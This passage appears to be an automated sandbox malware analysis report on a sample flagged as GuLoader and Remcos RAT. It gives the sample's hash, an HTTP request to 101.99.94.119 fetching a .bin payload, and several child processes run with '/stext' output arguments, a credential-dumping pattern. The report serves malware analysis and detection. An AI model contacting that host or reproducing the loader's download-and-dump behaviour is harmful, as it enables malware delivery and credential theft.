                              HTTP Request Dependency Graph

                              • 101.99.94.119

                              HTTP Packets

                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               0 | 192.168.2.3 | 49734 | 101.99.94.119 | 80 | C:\Users\user\Desktop\loKmeabs9V.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Aug 2, 2021 15:03:10.036640882 CEST | 5267 | OUT | GET /WEALTH_PRUuqVZw139.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 101.99.94.119
                              Cache-Control: no-cache
                               Aug 2, 2021 15:03:10.090718031 CEST | 5269 | IN | HTTP/1.1 200 OK
                              Date: Mon, 02 Aug 2021 05:03:09 GMT
                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                              Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT
                              ETag: "72840-5c886c5bd2c84"
                              Accept-Ranges: bytes
                              Content-Length: 469056
                              Content-Type: application/octet-stream


                              Code Manipulations

                              Statistics

                              Behavior

                              System Behavior

                              General

                               Start time: 15:01:09
                               Start date: 02/08/2021
                               Path: C:\Users\user\Desktop\loKmeabs9V.exe
                               Wow64 process (32bit): true
                               Commandline: 'C:\Users\user\Desktop\loKmeabs9V.exe'
                               Imagebase: 0x400000
                               File size: 114688 bytes
                               MD5 hash: E0D74762F123EB6603898D1482EB9752
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: Visual Basic
                               Yara matches:
                               • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                               Reputation: low

                              General

                               Start time: 15:02:09
                               Start date: 02/08/2021
                               Path: C:\Users\user\Desktop\loKmeabs9V.exe
                               Wow64 process (32bit): true
                               Commandline: 'C:\Users\user\Desktop\loKmeabs9V.exe'
                               Imagebase: 0x400000
                               File size: 114688 bytes
                               MD5 hash: E0D74762F123EB6603898D1482EB9752
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Yara matches:
                               • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                               Reputation: low

                              General

                               Start time: 15:03:11
                               Start date: 02/08/2021
                               Path: C:\Users\user\Desktop\loKmeabs9V.exe
                               Wow64 process (32bit): true
                               Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
                               Imagebase: 0x400000
                               File size: 114688 bytes
                               MD5 hash: E0D74762F123EB6603898D1482EB9752
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: low

                              General

                               Start time: 15:03:12
                               Start date: 02/08/2021
                               Path: C:\Users\user\Desktop\loKmeabs9V.exe
                               Wow64 process (32bit): true
                               Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
                               Imagebase: 0x400000
                               File size: 114688 bytes
                               MD5 hash: E0D74762F123EB6603898D1482EB9752
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: low

                              General

                               Start time: 15:03:13
                               Start date: 02/08/2021
                               Path: C:\Users\user\Desktop\loKmeabs9V.exe
                               Wow64 process (32bit): true
                               Commandline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
                               Imagebase: 0x400000
                               File size: 114688 bytes
                               MD5 hash: E0D74762F123EB6603898D1482EB9752
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: low

                              Disassembly

                              Code Analysis